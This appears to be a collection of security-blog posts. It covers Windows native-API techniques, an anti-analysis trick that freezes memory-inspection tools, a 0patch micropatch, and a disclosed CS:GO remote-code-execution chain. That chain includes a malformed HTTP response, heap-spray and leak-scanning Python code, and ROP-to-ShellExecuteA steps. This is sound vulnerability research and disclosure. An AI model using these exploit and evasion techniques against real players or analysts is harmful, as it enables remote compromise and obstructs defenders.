6
7
8
for(size_t i = 0; i < 128; ++i)
  NtSuspendThread(thread, nullptr);

while(true) {
  if(NtSuspendThread(thread, nullptr) != STATUS_SUSPEND_COUNT_EXCEEDED)
    std::puts("I was suspended\n");
  Sleep(1000);
}

Conclusion

If anything, I hope that this demonstrated that it’s best not to rely on NtSuspendProcess to work as well as you’d expect for tools dealing with potentially malicious or protected code. Hope you liked this post and expect more content to come out in the upcoming weeks.

Enumerating process modules

29 April 2018 at 00:00

On my quest of writing a library to wrap common winapi functionality using native apis I came across the need to enumerate process modules. One may think that there is a simple undocumented function to achieve such functionality, however that is not the case.

Existing options

First of all lets see what are the existing APIs that are provided by microsoft because surely they’d know their own code and the operating systems limitations best.

  • Process Status API has a rather understandable and simple interface to get an array of module handles and then acquire the information of module using other functions. If you have written windows specific code before you might feel rather comfortable but for a new developer dealing with extensive error handling due to the fact that you may need to reallocate memory might not be very fun.

    Structures and usage.

1
2
3
BOOL  EnumProcessModules(HANDLE process, HMODULE* modules, DWORD byteSize, DWORD* reqByteSize);
BOOL  GetModuleInformation(HANDLE process, HMODULE module, MODULEINFO* info, DWORD infoSize);
DWORD GetModuleFileNameEx(HANDLE process, HMODULE module, TCHAR* filename, DWORD filenameMaxSize);
  • Next up Tool Help is at the same time simpler and more complex than PSAPI. It does not require the user to allocate memory by himself and returns fully processed structures but requires quite a few extra steps. Toolhelp also leaves some opportunities for the user to shoot himself in the foot such as returning INVALID_HANDLE_VALUE instead of nullptr on failure and requires to clean up the resources by closing the handle.

    Structures and usage.

1
2
3
HANDLE CreateToolhelp32Snapshot(DWORD flags, DWORD processId);
BOOL   Module32First(HANDLE snapshot, MODULEENTRY32* entry);
BOOL   Module32Next(HANDLE snapshot, MODULEENTRY32* entry);

Performance

An important aspect of these functions is how fast they are. Below are some rough benchmarks of these apis to get full module information including its full path on a machine running Windows 10 with an i7-8550u processor compared to implementation written by ourselves.

TLHELP PSAPI native
220ms 2200 ms 50ms

Turns out that while EnumProcessModules is really fast by itself it only saves the dll base address instead of something like LDR_DATA_TABLE_ENTRY address where all of the information is saved. Due to this every single time you want to for example get the module name it repeats all the work iterating modules list once again.

The implementation

So what exactly do we need to do to get the modules of another process?

In essence the answer is rather simple:

  • Get its Process Environment Block (PEB) address.
  • Walk the LDR table whose address we acquired from PEB.

The first problem is that a process may have 2 PEBs - one 32bit and one 64bit. The most intuitive behaviour would be to get the modules of the same architecture as the target process. However NtQueryInformationProcess with the ProcessBasicInformation flag gives us access only to the PEB of the same architecture as ours. This problem was solved in the previous post so it will not be discussed further again.

The next problem is that PEB is not the only thing that depends on architecture. All structures and functions we plan to use will also need to be apropriatelly selected. To overcome this hurdle we will create 2 structures containing the correct functions and the type to use for representing pointers. We want to use different memory reading functions because if we are a 32 bit process NtReadVirtualMemory will also expect a 32 bit address which might not be sufficient when the target process is 64bit.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
template<class TargetPointer>
struct native_subsystem {
  using target_pointer = TargetPointer;

  template<class T>
  NTSTATUS static read(void* handle, uintptr_t address,
                       T&    buffer, size_t    size = sizeof(T)) noexcept
  {
    return NtReadVirtualMemory(
      handle, reinterpret_cast<void*>(address), &buffer, size, nullptr);
  }
};

struct wow64_subsystem {
  using target_pointer = uint64_t;

  template<class T>
  NTSTATUS static read(void* handle, uint64_t address,
                       T&    buffer, uint64_t size = sizeof(T)) noexcept
  {
    return NtWow64ReadVirtualMemory64(handle, address, &buffer, size, nullptr);
  }
};

For convenience sake and to keep our code DRY we will also need to write some sort of helper function which picks one of the aforementioned structures to use. For that we will use some templates. If this doesn’t fit you, macros or just functions pointers are an option, both of which have a set of their own pros and cons.

1
2
3
4
5
6
7
8
9
10
11
template<class Fn, class... As>
NTSTATUS subsystem_call(bool same_arch, Fn fn, As&&... args)
{
  if(same_arch)
    return fn.template operator()<native_subsystem<uintptr_t>>(forward<As>(args)...);
#ifdef _WIN64
  return fn.template operator()<native_subsystem<uint32_t>>(forward<As>(args)...);
#else
  return fn.template operator()<wow64_subsystem>(forward<As>(args)...);
#endif
}

While I agree this function looks rather ugly, operator() is really the most sane option because you don’t have to worry about naming things. Its usage is rather simple too. All you have to do is pass it whether the architecture is the same and a structure whose operator() is overloaded and accepts the subsystem type. We can take a look at exactly how the usage looks like by finally taking use of the functions we wrote earlier and completing the first step of getting the correct PEB pointer.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
template<class Callback>
NTSTATUS enum_modules(void* handle, Callback cb) noexcept
{
  PROCESS_EXTENDED_BASIC_INFORMATION info;
  info.Size = sizeof(info);
  ret_on_err(NtQueryInformationProcess(
    handle, ProcessBasicInformation, &info, sizeof(info), nullptr));

  const bool same_arch = is_process_same_arch(info);

  std::uint64_t peb_address;
  if(same_arch)
    peb_address = reinterpret_cast<std::uintptr_t>(info.BasicInfo.PebBaseAddress);
  else
    ret_on_err(remote_peb_address(handle, false, peb_address)));

  return subsystem_call(same_arch, enum_modules_t{}, handle, std::move(cb), peb_address);
}

Now all that is left is to implement the actual modules enumeration about which I won’t be talking as much because it is rather straightforward and information about it is easily found on the internet. For it to work you’ll also need architecture agnostic versions of windows structures that you can be easily made by templating their member types and some find+replace.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
struct enum_modules_t {
  template<class Subsystem, class Callback>
  NTSTATUS operator()(void* handle, Callback cb, std::uint64_t peb_address) const
  {
    using ptr_t = typename Subsystem::target_pointer;

    // we read the Ldr member of peb
    ptr_t Ldr;
    ret_on_err(Subsystem::read(handle,
                               static_cast<ptr_t>(peb_address) +
                                offsetof(peb_t<ptr_t>, Ldr),
                               Ldr));

    const auto list_head =
      Ldr + offsetof(peb_ldr_data_t<ptr_t>, InLoadOrderModuleList);

    // read InLoadOrderModulesList.Flink
    ptr_t load_order_modules_list_flink;
    ret_on_err(Subsystem::read(handle, list_head, load_order_modules_list_flink));

    ldr_data_table_entry_t<ptr_t> entry;

    // iterate over the modules list
    for(auto list_curr = load_order_modules_list_flink; list_curr != list_head;) {
      // read the entry
      ret_on_err(Subsystem::read(handle, list_curr, entry));

      // update the pointer to entry
      list_curr = entry.InLoadOrderLinks.Flink;

      // call the callback with the info.
      // to get the path we would need another read.
      cb(info);
  }

    return STATUS_SUCCESS;
  }
};

Acquiring process environment block (PEB)

20 April 2018 at 00:00

While attempting to enumerate modules of a remote process I came across the need to acquire the process environment block or PEB in short. While it may seem quite simple - that is a single native API call and you are done the problem is that there actually are 2 evironment blocks.

The problem at hand

As it turns out, the most documented method NtQueryInformationProcess(ProcessBasicInformation) can only acquire the address of PEB whose architecture is same as of your own process. As you can guess if the architectures do not match, the address you get is quite useless when trying to enumerate loaded modules. To solve the problem one has to use a bunch of different combinations of flags and APIs to get the correct structure.

Implementation

To cut the chase here is a table of exactly what needs to be used to correctly acquire the PEB according to architecture of your own and target process.

Target Local Function
same same NtQueryInformationProcess(ProcessBasicInformation)
32 bit 64 bit NtQueryInformationProcess(ProcessWow64Information)
64 bit 32 bit NtWow64QueryInformationProcess64(ProcessBasicInformation)

First step is to figure out whether our process is of the same architecture. Coincidentally that can be done by reusing the return value of same native API that actually returns the address of PEB.

1
2
3
4
5
6
7
8
9
10
11
// acquire the PROCESS_EXTENDED_BASIC_INFORMATION of target process
PROCESS_EXTENDED_BASIC_INFORMATION info;
info.Size = sizeof(info);
NtQueryInformationProcess(
  handle, ProcessBasicInformation, &info, sizeof(info), nullptr);

// function to check whether the arch is the same
bool is_process_same_arch(const PROCESS_EXTENDED_BASIC_INFORMATION& info) noexcept
{
  return info.IsWow64Process == !!NtCurrentTeb()->WowTebOffset;
}

And in the case where the architecture doesn’t match we can then choose to use one of the other two aforementioned APIs.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
NTSTATUS remote_peb_diff_arch(void* handle, uint64_t& peb_addr) noexcept
{
#ifdef _WIN64 // we are x64 and target is x32
  return NtQueryInformationProcess(
    handle, ProcessWow64Information, &peb_addr, sizeof(peb_addr), nullptr);
#else // we are x32 and the target is x64
  PROCESS_BASIC_INFORMATION64 pbi;
  const auto status = NtWow64QueryInformationProcess64(
    handle, ProcessBasicInformation, &pbi, sizeof(pbi), nullptr);

  if(NT_SUCCESS(status))
    peb_addr = pbi.PebBaseAddress;
  return status;
#endif
}

Lastly here is the full, finished code listing.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
bool is_process_same_arch(const PROCESS_EXTENDED_BASIC_INFORMATION& info) noexcept
{
  return info.IsWow64Process == !!NtCurrentTeb()->WowTebOffset;
}

NTSTATUS peb_address(void* handle, std::uint64_t& address) noexcept
  PROCESS_EXTENDED_BASIC_INFORMATION info;
  info.Size = sizeof(info);
  auto status = NtQueryInformationProcess(
    handle, ProcessBasicInformation, &info, sizeof(info), nullptr);

  if(NT_SUCCESS(status)){
    if(is_process_same_arch(info))
      peb_address = reinterpret_cast<std::uintptr_t>(info.BasicInfo.PebBaseAddress);
    else
      status = remote_peb_address(handle, false, peb_address));
  }

  return status;
}

The next article will explain how to enumerate the loaded modules list.

Preventing memory inspection on Windows

23 May 2021 at 23:00
By: jm

Have you ever wanted your dynamic analysis tool to take as long as GTA V to query memory regions while being impossible to kill and using 100% of the poor CPU core that encountered this? Well, me neither, but the technology is here and it’s quite simple!

What, Where, WTF?

As usual with my anti-debug related posts, everything starts with a little innocuous flag that Microsoft hasn’t documented. Or at least so I thought.

This time the main offender is NtMapViewOfSection, a syscall that can map a section object into the address space of a given process, mainly used for implementing shared memory and memory mapping files (The Win32 API for this would be MapViewOfFile).

NTSTATUS NtMapViewOfSection(
  HANDLE          SectionHandle,
  HANDLE          ProcessHandle,
  PVOID           *BaseAddress,
  ULONG_PTR       ZeroBits,
  SIZE_T          CommitSize,
  PLARGE_INTEGER  SectionOffset,
  PSIZE_T         ViewSize,
  SECTION_INHERIT InheritDisposition,
  ULONG           AllocationType,
  ULONG           Win32Protect);

By doing a little bit of digging around in ntoskrnl’s MiMapViewOfSection and searching in the Windows headers for known constants, we can recover the meaning behind most valid flag values.

/* Valid values for AllocationType */
MEM_RESERVE                0x00002000
SEC_PARTITION_OWNER_HANDLE 0x00040000
MEM_TOPDOWN                0x00100000
SEC_NO_CHANGE              0x00400000
SEC_FILE                   0x00800000
MEM_LARGE_PAGES            0x20000000
SEC_WRITECOMBINE           0x40000000

Initially I failed at ctrl+f and didn’t realize that 0x2000 is a known flag, so I started digging deeper. In the same function we can also discover what the flag does and its main limitations.

// --- MAIN FUNCTIONALITY ---
if (SectionOffset + ViewSize > SectionObject->SizeOfSection &&
    !(AllocationAttributes & 0x2000))
    return STATUS_INVALID_VIEW_SIZE;

// --- LIMITATIONS ---
// Image sections are not allowed
if ((AllocationAttributes & 0x2000) &&
    SectionObject->u.Flags.Image)
    return STATUS_INVALID_PARAMETER;

// Section must have been created with one of these 2 protection values
if ((AllocationAttributes & 0x2000) &&
    !(SectionObject->InitialPageProtection & (PAGE_READWRITE | PAGE_EXECUTE_READWRITE)))
    return STATUS_SECTION_PROTECTION;

// Physical memory sections are not allowed
if ((Params->AllocationAttributes & 0x20002000) &&
    SectionObject->u.Flags.PhysicalMemory)
    return STATUS_INVALID_PARAMETER;

Now, this sounds like a bog standard MEM_RESERVE and it’s possible to VirtualAlloc(MEM_RESERVE) whatever you want as well, however APIs that interact with this memory do treat it differently.

How differently you may ask? Well, after incorrectly identifying the flag as undocumented, I went ahead and attempted to create the biggest section I possibly could. Everything went well until I opened the ProcessHacker memory view. The PC was nigh unusable for at least a minute and after that process hacker remained unresponsive for a while as well. Subsequent runs didn’t seem to seize up the whole system however it still took up to 4 minutes for the NtQueryVirtualMemory call to return.

I guess you could call this a happy little accident as Bob Ross would say.

The cause

Since I’m lazy, instead of diving in and reversing, I decided to use Windows Performance Recorder. It’s a nifty tool that uses ETW tracing to give you a lot of insight into what was happening on the system. The recorded trace can then be viewed in Windows Performance Analyzer.

Trace Viewed in Windows Performance Analyzer

This doesn’t say too much, but at least we know where to look.

After spending some more time staring at the code in everyone’s favourite decompiler it became a bit more clear what’s happening. I’d bet that it’s iterating through every single page table entry for the given memory range. And because we’re dealing with terabytes of of data at a time it’s over a billion iterations. (MiQueryAddressState is a large function, and I didn’t think a short pseudocode snippet would do it justice)

This is also reinforced by the fact that from my testing the relation between view size and time taken is completely linear. To further verify this idea we can also do some quick napkin math to see if it all adds up:

instructions per second (ips) = 3.8Ghz * ~8
page table entries      (n)   = 12TB / 4096
time taken              (t)   = 3.5 minutes

instruction per page table entry = ips * t / n = ~2000

In my opinion, this number looks rather believable so, with everything added up, I’ll roll with the current idea.

Minimal Example

// file handle must be a handle to a non empty file
void* section = nullptr;
auto  status  = NtCreateSection(&section,
                                MAXIMUM_ALLOWED,
                                nullptr,
                                nullptr,
                                PAGE_EXECUTE_READWRITE,
                                SEC_COMMIT,
                                file_handle);
if (!NT_SUCCESS(status))
    return status;

// Personally largest I could get the section was 12TB, but I'm sure people with more
// memory could get it larger.
void* base = nullptr;
for (size_t i = 46;  i > 38; --i) {
    SIZE_T view_size = (1ull << i);
    status           = NtMapViewOfSection(section,
                                          NtCurrentProcess(),
                                          &base,
                                          0,
                                          0x1000,
                                          nullptr,
                                          &view_size,
                                          ViewUnmap,
                                          0x2000, // <- the flag
                                          PAGE_EXECUTE_READWRITE);

    if (NT_SUCCESS(status))
        break;
}

Do note that, ideally, you’d need to surround code with these sections because only the reserved portions of these sections cause the slowdown. Furthermore, transactions could also be a solution for needing a non-empty file without touching anything already existing or creating something visible to the user.

Conclusion

I think this is a great and powerful technique to mess with people analyzing your code. The resource usage is reasonable, all it takes to set it up is a few syscalls, and it’s unlikely to get accidentally triggered.

Posts

18 May 2021 at 04:26

About

1 January 2001 at 00:00

Micropatch for Remote Code Execution Issue in Internet Explorer (CVE-2021-26419)

18 May 2021 at 15:23

 


by Mitja Kolsek, the 0patch Team


May 2021 Windows Updates brought a fix for an "Exploitation More Likely" memory corruption vulnerability in Scripting Engine (CVE-2021-26419) discovered by Ivan Fratric of Google Project Zero. Ivan published details and a proof-of-concept the next day, and we took these to reproduce the vulnerability in our lab and create a micropatch for it.

Since Microsoft's patch was available, we reviewed it and found they only changed function ByteCodeGenerator::LoadCachedHeapArguments such that instead of calling ByteCodeGenerator::EmitPropStore, it now calls ByteCodeGenerator::EmitLocalPropInit.These are undocumented and largely unknown functions but their names imply the vulnerability resides in just-in-time compiler's code generation logic, where the generated code gets an improper level of access to the arguments object.

Our micropatch is logically identical to Microsoft's:



MODULE_PATH "..\Affected_Modules\jscript9.dll_11.0.9600.19867_64bit\jscript9.dll"
PATCH_ID 606
PATCH_FORMAT_VER 2
VULN_ID 7112
PLATFORM win64
patchlet_start
    PATCHLET_ID 1
    PATCHLET_TYPE 2
    PATCHLET_OFFSET 0xbe342
    N_ORIGINALBYTES 5
    JUMPOVERBYTES 0
    PIT jscript9!0x8be60 ; ByteCodeGenerator::EmitLocalPropInit
    
    code_start
        mov r9, rbp ; Some instructions are erased and a new function call added
        mov r8, rdi
        mov edx, esi
        mov rcx, rbx
        mov rbx, [rsp+70h]
        add rsp, 40h
        pop rdi
        pop rsi
        pop rbp
        jmp PIT_0x8be60 ; New call to EmitLocalPropInit
    code_end
    
patchlet_end

 

See the micropatch in action:




We'd like to thank  Ivan Fratric for sharing their analysis and POC, which allowed us to create this micropatch for Windows users without official security updates. We also encourage security researchers to privately share their analyses with us for micropatching.

This micropatch is immediately available to all 0patch users with a PRO license, and is already downloaded and applied on all online 0patch-protected Windows 7 and Windows Server 2008 R2 machines without Extended Security Updates, or with year 1 of Extended Security Updates.

To obtain the micropatch and have it applied on your computer(s) along with other micropatches included with a PRO license, create an account in 0patch Central, install 0patch Agent and register it to your account. Note that no computer restart is needed for installing the agent or applying/un-applying any 0patch micropatch. 

By the way, if your organization has either Windows 10 v1809 or Office 2010 installations that stopped receiving security updates, and would like to continue using them, it could be useful to know we've security-adopted both for at least 12 months. To save lots of money and step into the age of reboot-less security patching, contact [email protected].

To learn more about 0patch, please visit our Help Center




 

Counter-Strike Global Offsets: reliable remote code execution

One of the factors contributing to Counter-Strike Global Offensive’s (herein “CS:GO”) massive popularity is the ability for anyone to host their own community server. These community servers are free to download and install and allow for a high grade of customization. Server administrators can create and utilize custom assets such as maps, allowing for innovative game modes.

However, this design choice opens up a large attack surface. Players can connect to potentially malicious servers, exchanging complex game messages and binary assets such as textures.

We’ve managed to find and exploit two bugs that, when combined, lead to reliable remote code execution on a player’s machine when connecting to our malicious server. The first bug is an information leak that enabled us to break ASLR in the client’s game process. The second bug is an out-of-bounds access of a global array in the .data section of one of the game’s loaded modules, leading to control over the instruction pointer.

Community server list

Players can join community servers using a user friendly server browser built into the game:

Once the player joins a server, their game client and the community server start talking to each other. As security researchers, it was our task to understand the network protocol used by CS:GO and what kind of messages are sent so that we could look for vulnerabilities.

As it turned out, CS:GO uses its own UDP-based protocol to serialize, compress, fragment, and encrypt data sent between clients and a server. We won’t go into detail about the networking code, as it is irrelevant to the bugs we will present.

More importantly, this custom UDP-based protocol carries Protobuf serialized payloads. Protobuf is a technology developed by Google which allows defining messages and provides an API for serializing and deserializing those messages.

Here is an example of a protobuf message defined and used by the CS:GO developers:

message CSVCMsg_VoiceInit {
	optional int32 quality = 1;
	optional string codec = 2;
	optional int32 version = 3 [default = 0];
}

We found this message definition by doing a Google search after having discovered CS:GO utilizes Protobuf. We came across the SteamDatabase GitHub repository containing a list of Protobuf message definitions.

As the name of the message suggests, it’s used to initialize some kind of voice-message transfer of one player to the server. The message body carries some parameters, such as the codec and version used to interpret the voice data.

Developing a CS:GO proxy

Having this list of messages and their definitions enabled us to gain insights into what kind of data is sent between the client and server. However, we still had no idea in which order messages would be sent and what kind of values were expected. For example, we knew that a message exists to initialize a voice message with some codec, but we had no idea which codecs are supported by CS:GO.

For this reason, we developed a proxy for CS:GO that allowed us to view the communication in real-time. The idea was that we could launch the CS:GO game and connect to any server through the proxy and then dump any messages received by the client and sent to the server. For this, we reverse-engineered the networking code to decrypt and unpack the messages.

We also added the ability to modify the values of any message that would be sent/received. Since an attacker ultimately controls any value in a Protobuf serialized message sent between clients and the server, it becomes a possible attack surface. We could find bugs in the code responsible for initializing a connection without reverse-engineering it by mutating interesting fields in messages.

The following GIF shows how messages are being sent by the game and dumped by the proxy in real-time, corresponding to events such as shooting, changing weapons, or moving:

Equipped with this tooling, it was now time for us to discover bugs by flipping some bits in the protobuf messages.

OOB access in CSVCMsg_SplitScreen

We discovered that a field in the CSVCMsg_SplitScreen message, that can be sent by a (malicious) server to a client, can lead to an OOB access which subsequently leads to a controlled virtual function call.

The definition of this message is:

message CSVCMsg_SplitScreen {
	optional .ESplitScreenMessageType type = 1 [default = MSG_SPLITSCREEN_ADDUSER];
	optional int32 slot = 2;
	optional int32 player_index = 3;
}

CSVCMsg_SplitScreen seemed interesting, as a field called player_index is controlled by the server. However, contrary to intuition, the player_index field is not used to access an array, the slot field is. As it turns out, the slot field is used as an index for the array of splitscreen player objects located in the .data segment of engine.dll file without any bounds checks.

Looking at the crash we could already observe some interesting facts:

  1. The array is stored in the .data section within engine.dll
  2. After accessing the array, an indirect function call on the accessed object occurs

The following screenshot of decompiled code shows how player_splot was used without any checks as an index. If the first byte of the object was not 1, a branch is entered:

The bug proved to be quite promising, as a few instructions into the branch a vtable is dereferenced and a function pointer is called. This is shown in the next screenshot:

We were very excited about the bug as it seemed highly exploitable, given an info leak. Since the pointer to an object is obtained from a global array within engine.dll, which at the time of writing is a 6MB binary, we were confident that we could find a pointer to data we control. Pointing the aforementioned object to attacker controlled data would yield arbitrary code execution.

However, we would still have to fake a vtable at a known location and then point the function pointer to something useful. Due to this constraint, we decided to look for another bug that could lead to an info leak.

Uninitialized memory in HTTP downloads leads to information disclosure

As mentioned earlier, server admins can create servers with any number of customizations, including custom maps and sounds. Whenever a player joins a server with such customizations, files behind the customizations need to be transferred. Server admins can create a list of files that need to be downloaded for each map in the server’s playlist.

During the connection phase, the server sends the client the URL of a HTTP server where necessary files should be downloaded from. For each custom file, a cURL request would be created. Two options that were set for each request piqued our interested: CURLOPT_HEADERFUNCTION and CURLOPT_WRITEFUNCTION. The former allows a callback to be registered that is called for each HTTP header in the HTTP response. The latter allows registering a callback that is triggered whenever body data is received.

The following screenshot shows how these options are set:

We were interested in seeing how Valve developers handled incoming HTTP headers and reverse engineered the function we named CurlHeaderCallback().

It turned out that the CurlHeaderCallback() simply parsed the Content-Length HTTP header and allocated an uninitialized buffer on the heap accordingly, as the Content-Length should correspond to the size of the file that should be downloaded.

The CurlWriteCallback() would then simply write received data to this buffer.

Finally, once the HTTP request finished and no more data was to be received, the buffer would be written to disk.

We immediately noticed a flaw in the parsing of the HTTP header Content-Length: As the following screenshot shows, a case sensitive compare was made.

Case sensitive search for the Content-Length header.

This compare is flawed as HTTP headers can be lowercase as well. This is only the case for Linux clients as they use cURL and then do the compare. On Windows the client just assumes that the value returned by the Windows API is correct. This yields the same bug, as we can just send an arbitrary Content-Length header with a small response body.

We set up a HTTP server with a Python script and played around with some HTTP header values. Finally, we came up with a HTTP response that triggers the bug:

HTTP/1.1 200 OK
Content-Type: text/plain
Content-Length: 1337
content-length: 0
Connection: closed

When a client receives such a HTTP response for a file download, it would recognize the first Content-Length header and allocate a buffer of size 1337. However, a second content-length header with size 0 follows. Although the CS:GO code misses the second Content-Length header due to its case sensitive search and still expects 1337 bytes of body data, cURL uses the last header and finishes the request immediately.

On Windows, the API just returns the first header value even though the response is ill-formed. The CS:GO code then writes the allocated buffer to disk, along with all uninitialized memory contents, including pointers, contained within the buffer.

Although it appears that CS:GO uses the Windows API to handle the HTTP downloads on Windows, the exact same HTTP response worked and allowed us to create files of arbitrary size containing uninitialized memory contents on a player’s machine.

A server can then request these files through the CNETMsg_File message. When a client receives this message, they will upload the requested file to the server. It is defined as follows:

message CNETMsg_File {
	optional int32 transfer_id = 1;
	optional string file_name = 2;
	optional bool is_replay_demo_file = 3;
	optional bool deny = 4;
}

Once the file is uploaded, an attacker controlled server could search the file’s contents to find pointers into engine.dll or heap pointers to break ASLR. We described this step in detail in our appendix section Breaking ASLR.

Putting it all together: ConVars as a gadget

To further enable customization of the game, the server and client exchange ConVars, which are essentially configuration options.

Each ConVar is managed by a global object, stored in engine.dll. The following code snippet shows a simplified definition of such an object which is used to explain why ConVars turned out to be a powerful gadget to help exploit the OOB access:

struct ConVar {
    char *convar_name;
    int data_len;
    void *convar_data;
    int color_value;
};

A community server can update its ConVar values during a match and notify the client by sending the CNETMsg_SetConVar message:

message CMsg_CVars {
	message CVar {
		optional string name = 1;
		optional string value = 2;
		optional uint32 dictionary_name = 3;
	}

	repeated .CMsg_CVars.CVar cvars = 1;
}

message CNETMsg_SetConVar {
	optional .CMsg_CVars convars = 1;
}

These messages consist of a simple key/value structure. When comparing the message definition to the struct ConVar definition, it is correct to assume that the entirely attacker-controllable value field of the ConVar message is copied to the client’s heap and a pointer to it is stored in the convar_value field of a ConVar object.

As we previously discussed, the OOB access in CSVCMsg_SplitScreen occurs in an array of pointers to objects. Here is the decompilation of the code in which the OOB access occurs as a reminder:

Since the array and all ConVars are located in the .data section of engine.dll, we can reliably set the player_slot argument such that the ptr_to_object points to a ConVar value which we previously set. This can be illustrated as follows:

We also mentioned earlier that a few instructions after the OOB access a virtual method on the object is called. This happens as usual through a vtable dereference. Here is the code again as a reminder:

Since we control the contents of the object through the ConVar, we can simply set the vtable pointer to any value. In order to make the exploit 100% reliable, it would make sense to use the info leak to point back into the .data section of engine.dll into controlled data.

Luckily, some ConVars are interpreted as color values and expect a 4 byte (Red Blue Green Alpha) value, which can be attacker controlled. This value is stored directly in the color_value field in above struct ConVar definition. Since the CS:GO process on Windows is 32-bit, we were able to use the color value of a ConVar to fake a pointer.

If we use the fake object’s vtable pointer to point into the .data section of engine.dll, such that the called method overlaps with the color_value, we can finally hijack the EIP register and redirect control flow arbitrarily. This chain of dereferences can be illustrated as follows:

ROP chain to RCE

With ASLR broken and us having gained arbitrary instruction pointer control, all that was left to do was build a ROP chain that finally lead to us calling ShellExecuteA to execute arbitrary system commands.

Conclusion

We submitted both bugs in one report to Valve’s HackerOne program, along with the exploit we developed that proved 100% reliablity. Unfortunately, in over 4 months, we did not even receive an acknowledgment by a Valve representative. After public pressure, when it became apparent that Valve had also ignored other Security Researchers with similar impact, Valve finally fixed numerous security issues. We hope that Valve re-structures its Bug Bounty program to attract Security Researchers again.

Time Table

Date (DD/MM/YYYY) What
04.01.2021 Reported both bugs in one report to Valve’s bug bounty program
11.01.2021 A HackerOne triager verifies the bug and triages it
10.02.2021 First follow-up, no response from Valve
23.02.2021 Second follow-Up, no response from Valve
10.04.2021 Disclosure of Bug existance via twitter
15.04.2021 Third follow-up, no response from Valve
28.04.2021 Valve patches both bugs

Breaking ASLR

In the Uninitialized memory in HTTP downloads leads to information disclosure section, we showed how the HTTP download allowed us to view arbitrarily sized chunks of uninitialized memory in a client’s game process.

We discovered another message that seemed quite interesting to us: CSVCMsg_SendTable. Whenever a client received such a message, it would allocate an object with attacker-controlled integer on the heap. Most importantly, the first 4 bytes of the object would contain a vtable pointer into engine.dll.

def spray_send_table(s, addr, nprops):
    table = nmsg.CSVCMsg_SendTable()
    table.is_end = False
    table.net_table_name = "abctable"
    table.needs_decoder = False

    for _ in range(nprops):
        prop = table.props.add()
        prop.type = 0x1337ee00
        prop.var_name = "abc"
        prop.flags = 0
        prop.priority = 0
        prop.dt_name = "whatever"
        prop.num_elements = 0
        prop.low_value = 0.0
        prop.high_value = 0.0
        prop.num_bits = 0x00ff00ff

    tosend = prepare_payload(table, 9)
    s.sendto(tosend, addr)

The Windows heap is kind of nondeteministic. That is, a malloc -> free -> malloc combo will not yield the same block. Thankfully, Saar Amaar published his great research about the Windows heap, which we consulted to get a better understanding about our exploit context.

We came up with a spray to allocate many arrays of SendTable objects with markers to scan for when we uploaded the files back to the server. Because we can choose the size of the array, we chose a not so commonly alloacted size to avoid interference with normal game code. If we now deallocate all of the sprayed arrays at once and then let the client download the files the chance of one of the files to hit a previously sprayed chunk is relativly high.

In practice, we almost always got the leak in the first file and when we didn’t we could simply reset the connection and try again, as we have not corrupted the program state yet. In order to maximize success, we created four files for the exploit. This ensures that at least one of them succeeds and otherwise simply try again.

The following code shows how we scanned the received memory for our sprayed object to find the SendTable vtable which will point into engine.dll.

files_received.append(fn)
pp = packetparser.PacketParser(leak_callback)

for i in range(len(data) - 0x54):
    vtable_ptr = struct.unpack('<I', data[i:i+4])[0]
    table_type = struct.unpack('<I', data[i+8:i+12])[0]
    table_nbits = struct.unpack('<I', data[i+12:i+16])[0]
    if table_type == 0x1337ee00 and table_nbits == 0x00ff00ff:
        engine_base = vtable_ptr - OFFSET_VTABLE 
        print(f"vtable_ptr={hex(vtable_ptr)}")
        break

0patch Security-Adopts Windows 10 v1803 and v1809 to Keep it Running Securely

11 May 2021 at 08:05

Towards Micropatching the "Security Update Gap"

 


by Mitja Kolsek, the 0patch Team

 

[Update: We initially security-adopted only Windows 10 v1809, but were then approached by customers needing micropatches for v1803 as well, so we security-adopted that version too.]

The May 2021 Windows Updates will contain the last official security fixes for many editions of three Windows 10 operating system versions:

  1. Windows 10 v1803
  2. Windows 10 v1809
  3. Windows 10 v1909

For organizations with any of these versions installed on their computers, this means the end of official security patches, and a pressure to upgrade to a supported Windows 10 version. Such organization-wide operating system upgrade may seem like a simple, mostly automated task - but in reality, updates break things:

In addition, with many users working from home these days, upgrading an operating system involves users downloading a huge update via their home Internet connection and difficult remote assistance in case something goes wrong with the upgrade.

Consequently, customers were approaching us in recent months asking whether we were planning to security-adopt some of these Windows 10 versions (mostly version 1809, later also version 1803), as they were looking for ways to keep using them securely.

And so we've decided to security-adopt Windows 10 v1803 (build 10.0.17134) and v1809 (build 10.0.17763) - as we have previously security-adopted Windows 7, Windows Server 2008 R2, and Office 2010.

Starting this month, initially for one year, we will actively gather information about vulnerabilities affecting Windows 10 v1803/v1809 and, based on our risk criteria, create micropatches for this operating system. We will be particularly interested in any vulnerabilities patched by Microsoft in still-supported Windows 10 versions, and whether they might affect v1803/v1809 as well.

These micropatches will be included in 0patch PRO and Enterprise licenses along with all other micropatches we're issuing - which means that users protecting their Windows 10 v1803/v1809 with 0patch will also receive our occasional micropatches for "0day" vulnerabilities in various products.

In order to have our Windows 10 v1803/v1809 micropatches applied, users will have to have their computers fully updated with the latest (May 2021) official Windows Updates provided by Microsoft.

We welcome all interested organizations with Windows 10 v1803/v1809 to contact [email protected] for information about pricing, deployment, or setting up a trial. If you happen to be using a large number of v1909 versions in your environment, also let us know as given sufficient demand we will security-adopt those too.

 

Addressing The Security Update Gap 

Our security-adoption of an unsupported Windows 10 version is an important milestone on our journey towards addressing the "security update gap" on supported Windows versions, which aims to allow organizations to protect themselves with our micropatches while thoroughly testing monthly Windows Updates before deploying them. And eventually even skipping one or two monthly updates under our protection.

 

To learn more about 0patch, please visit our Help Center.  


 

 

 

Another Windows Installer Local Privilege Escalation Bug Gets a Micropatch (CVE-2021-26415)

6 May 2021 at 14:24

 


by Mitja Kolsek, the 0patch Team


On April 21, security researcher Adrian Denkiewicz published an in-depth analysis of a local privilege escalation vulnerability in Windows Installer that was fixed by April 2021 Windows Updates. Adrian's analysis included a proof-of-concept.

The vulnerability is a classical symbolic-link issue, whereby a privileged process (in this case, msiexec.exe) works with a file (in this case, installer log file) that the attacker is able to "redirect" to another location where the they do not have permissions to create or modify files.

